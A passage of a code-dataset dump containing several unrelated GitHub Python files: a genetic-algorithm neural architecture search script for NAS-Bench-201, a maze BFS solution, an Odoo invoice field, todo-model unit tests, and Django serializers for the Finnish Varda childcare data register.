format='NETCDF4')\n\n","repo_name":"eshort0401/goulburn_NT","sub_path":"CMORPH_scripts/CMORPH_transect.py","file_name":"CMORPH_transect.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"18556993276","text":"import os\nimport sys\nimport logging\nimport random\nimport torch.nn as nn\nimport genotypes\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport torch.utils\nimport torchvision.datasets as dset\nimport torch.backends.cudnn as cudnn\nimport torch.utils\nimport torch.nn.functional as F\nimport time\nimport utils\n\nfrom cell_operationsNAS201 import NAS_BENCH_201\nfrom config_utils import load_config\nfrom datasets import get_datasets, get_nas_search_loaders\nfrom gaNAS201 import GeneticAlgorithm\nfrom nas_201_api import NASBench201API as API\nfrom populationNAS201 import *\nfrom optimizers import get_optim_scheduler\nfrom search_model_NAS201 import TinyNetwork\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.autograd import Variable\n\nparser = argparse.ArgumentParser(\"NAS201\")\nparser.add_argument('--data', type = str, default = '../data', help = 'location of the data corpus')\nparser.add_argument('--dir', type = str, default = None, help = 'location of trials')\nparser.add_argument('--cutout', action = 'store_true', default = False, help = 'use cutout')\nparser.add_argument('--cutout_length', type = int, default = 16, help = 'cutout length')\nparser.add_argument('--batch_size', type = int, default = 64, help = 'batch size')\nparser.add_argument('--valid_batch_size', type = int, default = 1024, help = 'validation batch size')\nparser.add_argument('--epochs', type = int, default = 50, help = 'num of training epochs')\nparser.add_argument('--seed', type = int, default = 18, help = 'random seed')\nparser.add_argument('--gpu', type = int, default = 0, help = 'gpu device id')\nparser.add_argument('--tsize', type = int, default = 10, help = 'Tournament size')\nparser.add_argument('--num_elites', type = int, default = 1, help = 'Number of Elites')\nparser.add_argument('--mutate_rate', type = float, default = 0.1, help = 'mutation rate')\nparser.add_argument('--learning_rate', type = float, default = 0.025, help = 'init learning rate')\nparser.add_argument('--learning_rate_min', type = float, default = 0.001, help = 'min learning rate')\nparser.add_argument('--momentum', type = float, default = 0.9, help = 'momentum')\nparser.add_argument('--weight_decay', type = float, default = 3e-4, help = 'weight decay')\nparser.add_argument('--grad_clip', type = float, default = 5, help = 'gradient clipping')\nparser.add_argument('--pop_size', type = int, default = 50, help = 'population size')\nparser.add_argument('--report_freq', type = float, default = 50, help = 'report frequency')\nparser.add_argument('--init_channels', type = int, default = 16, help = 'num of init channels')\n\n# Added for NAS201\n#parser.add_argument('--channel', type = int, default = 16, help = 'initial channel for NAS201 network')\nparser.add_argument('--num_cells', type = int, default = 5, help = 'number of cells for NAS201 network')\nparser.add_argument('--max_nodes', type = int, default = 4, help = 'maximim nodes in the cell for NAS201 network')\nparser.add_argument('--track_running_stats', action = 'store_true', default = False, help = 'use track_running_stats in BN layer')\nparser.add_argument('--dataset', type = str, default = 'cifar10', help = '[\"cifar10\", \"cifar100\", \"ImageNet16-120\"]')\nparser.add_argument('--api_path', type = str, default = None, help = '[\"cifar10\", \"cifar10-valid\",\"cifar100\", \"imagenet16-120\"]')\nparser.add_argument('--trainval', action='store_true')\nparser.add_argument('--workers', type=int, default=2, help='number of data loading workers (default: 2)')\nparser.add_argument('--config_path', type=str, help='The config path.')\nargs = parser.parse_args()\n\ndef get_arch_score(api, arch_index, dataset, hp, acc_type):\n info = api.query_by_index(arch_index, hp = str(hp))\n return info.get_metrics(dataset, acc_type)['accuracy']\n\ndef train(model, train_queue, criterion, optimizer, gen):\n model.train()\n for step, (inputs, targets) in enumerate(train_queue):\n #model.copy_arch_parameters(population.get_population()[step % args.pop_size].arch_parameters)\n #assert utils.check_equality(model, population.get_population()[step % args.pop_size].arch_parameters)\n #discrete_alphas = utils.discretize(population.get_population()[step % args.pop_size].arch_parameters, device)\n \n #Copying and checking the discretized alphas\n model.update_alphas(population.get_population()[step % args.pop_size].arch_parameters[0])\n discrete_alphas = model.discretize()\n _, df_max, _ = model.show_alphas_dataframe()\n assert np.all(np.equal(df_max.to_numpy(), discrete_alphas.cpu().numpy()))\n assert model.check_alphas(discrete_alphas)\n \n n = inputs.size(0)\n inputs = inputs.to(device)\n targets = targets.to(device)\n \n #inputs = inputs.cuda(non_blocking=True)\n #targets = targets.cuda(non_blocking=True)\n optimizer.zero_grad()\n _, logits = model(inputs)\n loss = criterion(logits, targets)\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n optimizer.step()\n\n prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n population.get_population()[step % args.pop_size].objs.update(loss.data.cpu().item(), n)\n population.get_population()[step % args.pop_size].top1.update(prec1.data.cpu().item(), n)\n population.get_population()[step % args.pop_size].top5.update(prec5.data.cpu().item(), n)\n \n #population.get_population()[step % args.pop_size].accumulate()\n \n #print(step)\n if (step + 1) % 100 == 0:\n # break\n logging.info(\"[{} Generation]\".format(gen))\n logging.info(\"Using Training batch #{} for {}/{} architecture with loss: {}, prec1: {}, prec5: {}\".format(step, step % args.pop_size, \n len(population.get_population()), \n population.get_population()[step % args.pop_size].objs.avg, \n population.get_population()[step % args.pop_size].top1.avg, \n population.get_population()[step % args.pop_size].top5.avg))\n #break\n\ndef validation(model, valid_queue, criterion, gen):\n model.eval()\n for i in range(len(population.get_population())):\n valid_start = time.time()\n #discrete_alphas = utils.discretize(population.get_population()[i].arch_parameters, device)\n #model.copy_arch_parameters(discrete_alphas)\n #assert utils.check_equality(model, discrete_alphas)\n \n #Copying and checking the discretized alphas\n model.update_alphas(population.get_population()[i].arch_parameters[0])\n discrete_alphas = model.discretize()\n _, df_max, _ = model.show_alphas_dataframe()\n assert np.all(np.equal(df_max.to_numpy(), discrete_alphas.cpu().numpy()))\n assert model.check_alphas(discrete_alphas)\n \n population.get_population()[i].objs.reset()\n population.get_population()[i].top1.reset()\n population.get_population()[i].top5.reset()\n with torch.no_grad():\n for step, (inputs, targets) in enumerate(valid_queue):\n n = inputs.size(0)\n inputs = inputs.to(device)\n targets = targets.to(device)\n _, logits = model(inputs)\n loss = criterion(logits, targets)\n \n prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n population.get_population()[i].objs.update(loss.data.cpu().item(), n)\n population.get_population()[i].top1.update(prec1.data.cpu().item(), n)\n population.get_population()[i].top5.update(prec5.data.cpu().item(), n)\n \n #print(step)\n #if (step + 1) % 10 == 0:\n #break\n #print(\"Finished in {} seconds\".format((time.time() - valid_start) ))\n\n logging.info(\"[{} Generation] {}/{} finished with validation loss: {}, prec1: {}, prec5: {}\".format(gen, i+1, len(population.get_population()), \n population.get_population()[i].objs.avg, \n population.get_population()[i].top1.avg, \n population.get_population()[i].top5.avg))\n #break\n\nDIR = \"search-{}-{}\".format(time.strftime(\"%Y%m%d-%H%M%S\"), args.dataset)\nif args.dir is not None:\n if not os.path.exists(args.dir):\n utils.create_exp_dir(args.dir)\n DIR = os.path.join(args.dir, DIR)\nelse:\n DIR = os.path.join(os.getcwd(), DIR)\nutils.create_exp_dir(DIR)\nutils.create_exp_dir(os.path.join(DIR, \"weights\"))\nlog_format = '%(asctime)s %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format, datefmt='%m/%d %I:%M:%S %p')\nfh = logging.FileHandler(os.path.join(DIR, 'log.txt'))\nfh.setFormatter(logging.Formatter(log_format))\nlogging.getLogger().addHandler(fh)\n\n# Initializing the summary writer\nwriter = SummaryWriter(os.path.join(DIR, 'runs'))\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\n\ndevice = torch.device(\"cuda:{}\".format(args.gpu))\ncpu_device = torch.device(\"cpu\")\n\ntorch.cuda.set_device(args.gpu)\ncudnn.deterministic = True\ncudnn.enabled = True\ncudnn.benchmark = False\n\nassert args.api_path is not None, 'NAS201 data path has not been provided'\napi = API(args.api_path, verbose = False)\nlogging.info(f'length of api: {len(api)}')\n\n# Configuring dataset and dataloader\nif args.dataset == 'cifar10':\n acc_type = 'ori-test'\n val_acc_type = 'x-valid'\nelse:\n acc_type = 'x-test'\n val_acc_type = 'x-valid'\n\ndatasets = ['cifar10', 'cifar100', 'ImageNet16-120']\nassert args.dataset in datasets, 'Incorrect dataset'\nif args.cutout:\n train_data, valid_data, xshape, num_classes = get_datasets(name = args.dataset, root = args.data, cutout=args.cutout)\nelse:\n train_data, valid_data, xshape, num_classes = get_datasets(name = args.dataset, root = args.data, cutout=-1)\nlogging.info(\"train data len: {}, valid data len: {}, xshape: {}, #classes: {}\".format(len(train_data), len(valid_data), xshape, num_classes))\n\nconfig = load_config(path=args.config_path, extra={'class_num': num_classes, 'xshape': xshape}, logger=None)\nlogging.info(f'config: {config}')\n_, train_loader, valid_loader = get_nas_search_loaders(train_data=train_data, valid_data=valid_data, dataset=args.dataset,\n config_root='configs', batch_size=(args.batch_size, args.valid_batch_size),\n workers=args.workers)\ntrain_queue, valid_queue = train_loader, valid_loader\nlogging.info('search_loader: {}, valid_loader: {}'.format(len(train_queue), len(valid_queue)))\n\n# Model Initialization\n#model_config = {'C': 16, 'N': 5, 'num_classes': num_classes, 'max_nodes': 4, 'search_space': NAS_BENCH_201, 'affine': False}\nmodel = TinyNetwork(C = args.init_channels, N = args.num_cells, max_nodes = args.max_nodes,\n num_classes = num_classes, search_space = NAS_BENCH_201, affine = False,\n track_running_stats = args.track_running_stats)\nmodel = model.to(device)\n#logging.info(model)\n\noptimizer, _, criterion = get_optim_scheduler(parameters=model.get_weights(), config=config)\ncriterion = criterion.cuda()\nlogging.info(f'optimizer: {optimizer}\\nCriterion: {criterion}')\n\n# logging the initialized architecture\nbest_arch_per_epoch = []\n\narch_str = model.genotype().tostr()\narch_index = api.query_index_by_arch(model.genotype())\nif args.dataset == 'cifar10':\n test_acc = get_arch_score(api, arch_index, 'cifar10', 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, 'cifar10-valid', 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, 0)\n writer.add_scalar(\"valid_acc\", valid_acc, 0)\nelse:\n test_acc = get_arch_score(api, arch_index, args.dataset, 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, args.dataset, 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, 0)\n writer.add_scalar(\"valid_acc\", valid_acc, 0)\ntmp = (arch_str, test_acc, valid_acc)\nbest_arch_per_epoch.append(tmp)\n\n'''\noptimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum = args.momentum, weight_decay = args.weight_decay)\ncriterion = nn.CrossEntropyLoss()\ncriterion.to(device)\ntrain_queue = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, pin_memory = False, num_workers = 2,\n sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[:split]))\nvalid_queue = torch.utils.data.DataLoader(\n train_data, batch_size = 1024, #args.batch_size,\n sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[split:num_train]),\n pin_memory = False, num_workers = 2)\n'''\nscheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs), eta_min = args.learning_rate_min)\nlogging.info(f'Scheduler: {scheduler}')\n\n## Creating Population\npopulation = Population(pop_size = args.pop_size, num_edges = model.get_alphas()[0].shape[0], device = device)\n\nlogging.info(f'torch version: {torch.__version__}, torchvision version: {torch.__version__}')\nlogging.info(\"gpu device = {}\".format(args.gpu))\nlogging.info(\"args = %s\", args)\nlogging.info(\"[INFO] Using ga with dicretization\")\n\nga = GeneticAlgorithm(args.num_elites, args.tsize, device, args.mutate_rate)\n\n#scheduler.step()\nlr = scheduler.get_lr()[0]\n\n# STAGE 1\nstart = time.time()\nfor epoch in range(args.epochs):\n ## Training the whole population\n logging.info(\"[INFO] Generation {} training with learning rate {}\".format(epoch + 1, scheduler.get_lr()[0]))\n start_time = time.time()\n\n train(model, train_queue, criterion, optimizer, epoch + 1)\n logging.info(\"[INFO] Training finished in {} minutes\".format((time.time() - start_time) / 60))\n torch.save(model.state_dict(), \"model.pt\")\n #lr = scheduler.get_lr()[0]\n scheduler.step()\n\n logging.info(\"[INFO] Evaluating Generation {} \".format(epoch + 1))\n validation(model, valid_queue, criterion, epoch + 1)\n\n # Sorting the population according to the fitness in decreasing order\n population.pop_sort()\n \n for i, p in enumerate(population.get_population()):\n writer.add_scalar(\"pop_top1_{}\".format(i + 1), p.get_fitness(), epoch + 1)\n writer.add_scalar(\"pop_top5_{}\".format(i + 1), p.top5.avg, epoch + 1)\n writer.add_scalar(\"pop_obj_valid_{}\".format(i + 1), p.objs.avg, epoch + 1)\n\n # Saving the population after each generation\n tmp = []\n for individual in population.get_population():\n tmp.append(tuple((individual.arch_parameters[0].cpu().numpy(), individual.get_fitness())))\n with open(os.path.join(DIR, \"population_{}.pickle\".format(epoch + 1)), 'wb') as f:\n pickle.dump(tmp, f)\n\n # Copying the best individual to the model\n model.update_alphas(population.get_population()[0].arch_parameters[0])\n assert model.check_alphas(population.get_population()[0].arch_parameters[0])\n arch_str = model.genotype().tostr()\n arch_index = api.query_index_by_arch(model.genotype())\n if args.dataset == 'cifar10':\n test_acc = get_arch_score(api, arch_index, 'cifar10', 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, 'cifar10-valid', 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, epoch + 1)\n writer.add_scalar(\"valid_acc\", valid_acc, epoch + 1)\n else:\n test_acc = get_arch_score(api, arch_index, args.dataset, 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, args.dataset, 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, epoch + 1)\n writer.add_scalar(\"valid_acc\", valid_acc, epoch + 1)\n tmp = (arch_str, test_acc, valid_acc)\n best_arch_per_epoch.append(tmp)\n \n # Applying Genetic Algorithm\n pop = ga.evolve(population)\n population = pop \n \n last = time.time() - start_time\n logging.info(\"[INFO] {}/{} epoch finished in {} minutes\".format(epoch + 1, args.epochs, last / 60))\n utils.save(model, os.path.join(DIR, \"weights\",\"weights.pt\"))\n \n #if epoch > 0:\n # break\n\nwriter.close()\n\nlast = time.time() - start\nlogging.info(\"[INFO] {} hours\".format(last / 3600))\n\nlogging.info(f'[INFO] Best Architecture after the search: {best_arch_per_epoch[-1]}')\nlogging.info(f'length best_arch_per_epoch: {len(best_arch_per_epoch)}')\nwith open(os.path.join(DIR, \"best_architectures.pickle\"), 'wb') as f:\n pickle.dump(best_arch_per_epoch, f)\n\n","repo_name":"nightstorm0909/EvNAS","sub_path":"train_searchNAS201.py","file_name":"train_searchNAS201.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33425965501","text":"\n\n\nfrom sys import stdin\n\ndef bfs(i, j):\n Q = [[i, j]]\n front = 0\n rear = 1\n while front != rear:\n ni, nj = Q[front]\n front += 1\n for x, y in [[1, 0], [-1, 0], [0, 1], [0, -1]]:\n nni, nnj = ni + x, nj + y\n if 0 <= nni < N and 0 <= nnj < M and arr[nni][nnj] == '1' and visited[nni][nnj] > visited[ni][nj] + int(arr[ni][nj]):\n visited[nni][nnj] = visited[ni][nj] + int(arr[ni][nj])\n rear += 1\n Q.append([nni, nnj])\n\nN, M = map(int, stdin.readline().split())\narr = [list(stdin.readline().strip()) for _ in range(N)]\nvisited = [[999]*M for _ in range(N)]\nvisited[0][0] = 1\nbfs(0, 0)\nprint(visited[N-1][M-1])","repo_name":"bigleaderman/algorithm_study","sub_path":"ssafy/22_04/0407/baekjoon/baekjoon_2178_미로탐색.py","file_name":"baekjoon_2178_미로탐색.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19642305878","text":"from odoo import api, fields, models\n\n\nclass AccountInvoice(models.Model):\n _inherit = \"account.invoice\"\n\n partner_no = fields.Char(\n string=\"Partner Number\",\n readonly=True,\n store=True,\n compute=\"_compute_partner_no\",\n )\n\n # We apply padding for better sorting and searchability.\n # i.e. there can be '999' and '1111' for partner_no of res.partner\n # records and sorting does not yield the expected result without padding.\n @api.depends(\"commercial_partner_id\", \"commercial_partner_id.partner_no\")\n def _compute_partner_no(self):\n for rec in self:\n partner = rec.commercial_partner_id\n if partner and partner.partner_no:\n rec.partner_no = partner.partner_no.zfill(6)\n","repo_name":"qrtl/nrq-custom","sub_path":"account_invoice_partner_number/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21389880522","text":"import os\nimport unittest\n\nfrom apps.todotasks.model import TodoModel\nfrom settings.database.utils import create_tables_database, dict_factory\nfrom settings.tests.database import TestDatabaseConnection\n\n\nclass TestTodoModel(unittest.TestCase):\n def setUp(self) -> None:\n return super().setUp()\n\n def tearDown(self) -> None:\n with self.model.database() as connection:\n cursor = connection.cursor()\n cursor.execute(\"DELETE FROM tasks\")\n return super().tearDown()\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.model = TodoModel()\n cls.model.database = TestDatabaseConnection\n create_tables_database(cls.model.database.database_path)\n\n email = \"test@fake.com\"\n with cls.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n cursor.execute(\"INSERT INTO users(email, password) VALUES(?, ?)\", (email, \"12345678\"))\n cls.user = cursor.execute(\"SELECT user_id, email, password, created_at FROM users WHERE email = ?\", (email,)).fetchone()\n\n return super().setUpClass()\n\n @classmethod\n def tearDownClass(cls) -> None:\n if os.path.exists(cls.model.database.database_path):\n os.remove(cls.model.database.database_path)\n return super().tearDownClass()\n\n def test_create_task(self):\n new_task = \"New task\"\n result = self.model.create_task(self.user[\"user_id\"], new_task)\n\n self.assertTrue(result)\n\n def test_create_task_created(self):\n new_task = \"New task\"\n self.model.create_task(self.user[\"user_id\"], new_task)\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n self.assertEqual(task[\"task_name\"], new_task)\n\n def test_update_task(self):\n new_task = \"New task\"\n self.model.create_task(self.user[\"user_id\"], new_task)\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n result = self.model.update(self.user[\"user_id\"], task[\"task_id\"], \"Task updated\")\n\n self.assertTrue(result)\n\n def test_update_task_wrong_task_id(self):\n result = self.model.update(self.user[\"user_id\"], 10000, \"Task updated\")\n\n self.assertFalse(result)\n\n def test_get_all_tasks(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n result = self.model.get_all_tasks(self.user[\"user_id\"])\n\n self.assertIsInstance(result, list)\n\n def test_get_all_tasks_no_tasks(self):\n result = self.model.get_all_tasks(self.user[\"user_id\"])\n\n self.assertEqual(None, result)\n\n def test_delete_task(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n\n result = self.model.delete(self.user[\"user_id\"], task[\"task_id\"])\n\n self.assertTrue(result)\n\n def test_delete_task_no_task(self):\n result = self.model.delete(self.user[\"user_id\"], 10000)\n\n self.assertFalse(result)\n\n def test_get_task_id(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n task = dict(task)\n \n result = self.model.get_task_id(self.user[\"user_id\"], 1)\n self.assertEqual(task[\"task_id\"], result)\n","repo_name":"amssdias/py-task","sub_path":"apps/todotasks/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8348553395","text":"import datetime\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib.postgres.aggregates import StringAgg\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import connection\nfrom django.db.models import OuterRef, Q, Subquery, Sum\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_serializer_method\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import DecimalField\nfrom rest_framework.reverse import reverse\n\nfrom varda import validators\nfrom varda.clients.allas_s3_client import Client as S3Client\nfrom varda.constants import SUCCESSFUL_STATUS_CODE_LIST\nfrom varda.custom_swagger import CustomSchemaField\nfrom varda.enums.change_type import ChangeType\nfrom varda.enums.error_messages import ErrorMessages\nfrom varda.enums.organisaatiotyyppi import Organisaatiotyyppi\nfrom varda.excel_export import ExcelReportSubtype, ReportStatus, ExcelReportType, get_s3_object_name\nfrom varda.misc import CustomServerErrorException, decrypt_excel_report_password, decrypt_henkilotunnus\nfrom varda.misc_queries import get_active_filter, get_history_value_subquery, get_related_object_changed_id_qs\nfrom varda.models import (Henkilo, Huoltajuussuhde, KieliPainotus, Lapsi, Maksutieto, MaksutietoHuoltajuussuhde,\n Palvelussuhde, PidempiPoissaolo, Taydennyskoulutus, TaydennyskoulutusTyontekija, Tutkinto,\n Tyoskentelypaikka, TilapainenHenkilosto, ToiminnallinenPainotus, Toimipaikka, Tyontekija,\n Organisaatio, Varhaiskasvatuspaatos, Varhaiskasvatussuhde, Z10_KelaVarhaiskasvatussuhde,\n Z4_CasKayttoOikeudet, Z6_RequestCount, Z6_RequestLog, Z6_RequestSummary, Z8_ExcelReport,\n Z9_RelatedObjectChanged)\nfrom varda.serializers import ToimipaikkaHLField, OrganisaatioPermissionCheckedHLField\nfrom varda.serializers_common import OidRelatedField\n\n\nclass KelaBaseSerializer(serializers.Serializer):\n kotikunta_koodi = serializers.CharField(source='henkilo_instance.kotikunta_koodi')\n henkilotunnus = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if 'view' in self.context:\n # view is not present in context in Swagger\n self.datetime_lte = self.context['view'].datetime_lte\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte).distinct('id')\n .order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n instance.henkilo_instance = henkilo\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n\nclass KelaEtuusmaksatusAloittaneetSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='A', initial='A')\n vakasuhde_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm')\n\n\nclass KelaEtuusmaksatusMaaraaikaisetSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='M', initial='M')\n vakasuhde_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n vakasuhde_paattymis_pvm = serializers.DateField(source='suhde_paattymis_pvm')\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm')\n\n\nclass KelaEtuusmaksatusLopettaneetSerializer(serializers.Serializer):\n kotikunta_koodi = serializers.CharField()\n henkilotunnus = serializers.SerializerMethodField()\n tietue = serializers.CharField(default='L', initial='L')\n vakasuhde_paattymis_pvm = serializers.DateField(source='paattymis_pvm')\n\n def get_henkilotunnus(self, instance):\n return decrypt_henkilotunnus(instance.henkilotunnus)\n\n class Meta:\n model = Varhaiskasvatussuhde\n fields = ['henkilotunnus', 'kotikunta_koodi', 'tietue', 'vakasuhde_paattymis_pvm']\n\n\nclass KelaEtuusmaksatusKorjaustiedotSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='K', initial='K')\n vakasuhde_alkamis_pvm = serializers.SerializerMethodField()\n vakasuhde_paattymis_pvm = serializers.SerializerMethodField()\n vakasuhde_alkuperainen_alkamis_pvm = serializers.SerializerMethodField()\n vakasuhde_alkuperainen_paattymis_pvm = serializers.SerializerMethodField()\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm',\n 'vakasuhde_alkuperainen_alkamis_pvm', 'vakasuhde_alkuperainen_paattymis_pvm')\n\n def get_vakasuhde_alkamis_pvm(self, instance):\n is_different = instance.suhde_alkamis_pvm != instance.old_suhde_alkamis_pvm\n return instance.suhde_alkamis_pvm if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_paattymis_pvm(self, instance):\n # If paattymis_pvm has been set, it is reported in Lopettaneet, do not report change here\n is_different = (instance.suhde_paattymis_pvm != instance.old_suhde_paattymis_pvm and\n instance.old_suhde_paattymis_pvm is not None)\n return instance.suhde_paattymis_pvm or datetime.date(1, 1, 1) if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_alkuperainen_alkamis_pvm(self, instance):\n is_different = instance.suhde_alkamis_pvm != instance.old_suhde_alkamis_pvm\n return instance.old_suhde_alkamis_pvm if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_alkuperainen_paattymis_pvm(self, instance):\n is_different = instance.suhde_paattymis_pvm != instance.old_suhde_paattymis_pvm\n return instance.old_suhde_paattymis_pvm or datetime.date(1, 1, 1) if is_different else datetime.date(1, 1, 1)\n\n\nclass KelaEtuusmaksatusKorjaustiedotPoistetutSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='K', initial='K')\n vakasuhde_alkamis_pvm = serializers.DateField(default='0001-01-01')\n vakasuhde_paattymis_pvm = serializers.DateField(default='0001-01-01')\n vakasuhde_alkuperainen_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n vakasuhde_alkuperainen_paattymis_pvm = serializers.SerializerMethodField()\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm',\n 'vakasuhde_alkuperainen_alkamis_pvm', 'vakasuhde_alkuperainen_paattymis_pvm')\n\n def get_vakasuhde_alkuperainen_paattymis_pvm(self, instance):\n return instance.suhde_paattymis_pvm or datetime.date(1, 1, 1)\n\n\nclass TiedonsiirtotilastoSerializer(serializers.Serializer):\n vakatoimijat = serializers.IntegerField()\n toimipaikat = serializers.IntegerField()\n vakasuhteet = serializers.IntegerField()\n vakapaatokset = serializers.IntegerField()\n lapset = serializers.IntegerField()\n maksutiedot = serializers.IntegerField()\n kielipainotukset = serializers.IntegerField()\n toiminnalliset_painotukset = serializers.IntegerField()\n paos_oikeudet = serializers.ReadOnlyField()\n\n\nclass AbstractErrorReportErrorsSerializer(serializers.Serializer):\n error_code = serializers.CharField()\n description = serializers.CharField()\n model_name = serializers.CharField()\n model_id_list = serializers.ListField(child=serializers.IntegerField())\n\n\nclass AbstractErrorReportSerializer(serializers.ModelSerializer):\n errors = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=AbstractErrorReportErrorsSerializer)\n def get_errors(self, instance):\n # This function parses the list of errors from different error attributes in the object.\n error_list = []\n for view_error_list in self.context['view'].get_errors():\n error_dict = view_error_list[0].value\n error_attr = (getattr(instance, error_dict['error_code'].lower(), '') or\n getattr(instance, error_dict['error_code'], ''))\n if error_attr is not None and error_attr != '':\n model_id_list = error_attr.split(',')\n error_list.append({\n **error_dict,\n 'model_name': view_error_list[4],\n 'model_id_list': [int(model_id) for model_id in set(model_id_list)]\n })\n return error_list\n\n\nclass AbstractHenkiloErrorReportSerializer(AbstractErrorReportSerializer):\n henkilo_id = serializers.IntegerField(source='henkilo.id')\n henkilo_oid = serializers.ReadOnlyField(source='henkilo.henkilo_oid')\n etunimet = serializers.ReadOnlyField(source='henkilo.etunimet')\n sukunimi = serializers.ReadOnlyField(source='henkilo.sukunimi')\n\n\nclass ErrorReportLapsetSerializer(AbstractHenkiloErrorReportSerializer):\n lapsi_id = serializers.IntegerField(source='id')\n oma_organisaatio_id = serializers.IntegerField(source='oma_organisaatio.id', allow_null=True)\n oma_organisaatio_oid = serializers.ReadOnlyField(source='oma_organisaatio.organisaatio_oid', allow_null=True)\n oma_organisaatio_nimi = serializers.ReadOnlyField(source='oma_organisaatio.nimi', allow_null=True)\n paos_organisaatio_id = serializers.IntegerField(source='paos_organisaatio.id', allow_null=True)\n paos_organisaatio_oid = serializers.ReadOnlyField(source='paos_organisaatio.organisaatio_oid', allow_null=True)\n paos_organisaatio_nimi = serializers.ReadOnlyField(source='paos_organisaatio.nimi', allow_null=True)\n\n class Meta:\n model = Lapsi\n fields = ('lapsi_id', 'henkilo_id', 'henkilo_oid', 'etunimet', 